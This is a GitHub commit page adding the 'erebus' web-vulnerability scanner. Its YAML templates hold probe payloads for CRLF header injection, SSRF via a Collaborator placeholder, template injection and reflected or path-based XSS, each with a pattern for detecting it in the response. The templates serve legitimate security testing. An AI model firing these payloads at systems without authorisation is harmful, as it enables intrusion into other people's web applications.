Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
ethicalhackingplayground committed Feb 26, 2021
1 parent db6746b commit c3f8a11
Show file tree
Hide file tree
Showing 17 changed files with 1,175 additions and 0 deletions.
10 changes: 10 additions & 0 deletions erebus-templates/crlf.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
request:
payloads:
- "%0D%0ASet-Cookie:mycookie=myvalue"

paths: false
response:
statusCode: 200
header: "Set-Cookie:mycookie=myvalue"
exclude:
- "%0D%0A"
11 changes: 11 additions & 0 deletions erebus-templates/ssrf.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
request:
payloads:
- http://{{burp-collab}}
- https://{{burp-collab}}

paths: false
response:
statusCode: 200
patterns:
- "ssrf has been found!!!"
- "ssrf has been found!!!"
9 changes: 9 additions & 0 deletions erebus-templates/ssti.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
request:
payloads:
- "{{7*7}}foobar"

paths: false
response:
statusCode: 200
patterns:
- "49foobar"
9 changes: 9 additions & 0 deletions erebus-templates/xss-path.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
request:
payloads:
- '"><script>alert(1)</script>'

paths: true
response:
statusCode: 200
patterns:
- '"><script>alert(1)</script>'
13 changes: 13 additions & 0 deletions erebus-templates/xss-reflected.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
request:
payloads:
- '"><script>alert(1)</script>'

paths: false
parameters: true
response:
statusCode: 200
patterns:
- '"><script>alert(1)</script>'
header:
- text/json
- application/json
3 changes: 3 additions & 0 deletions go.mod
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
module src

go 1.13
3 changes: 3 additions & 0 deletions install.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
#!/bin/bash

cd src/; go build -o erebus; mv erebus ../; cd ../
30 changes: 30 additions & 0 deletions src/banner/banner.go
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
package banner

import (
"github.com/projectdiscovery/gologger"
"github.com/projectdiscovery/gologger/levels"
)

// The banner message
func Display() {
// Banner
const banner = `
______ __
/ ____/_______ / /_ __ _______
/ __/ / ___/ _ \/ __ \/ / / / ___/
/ /___/ / / __/ /_/ / /_/ (__ )
/_____/_/ \___/_.___/\__,_/____/ v1.0-dev
`

gologger.DefaultLogger.SetMaxLevel(levels.LevelDebug)

gologger.Print().Msgf("%s\n", banner)
gologger.Print().Msg("\t\tgithub.com/ethicalhackingplayground\n\n")

gologger.Info().Msg("Use with caution. You are responsible for your actions\n")
gologger.Info().Msg("Developers assume no liability and are not responsible for any misuse or damage.\n\n")
}

0 comments on commit c3f8a11

Please sign in to comment.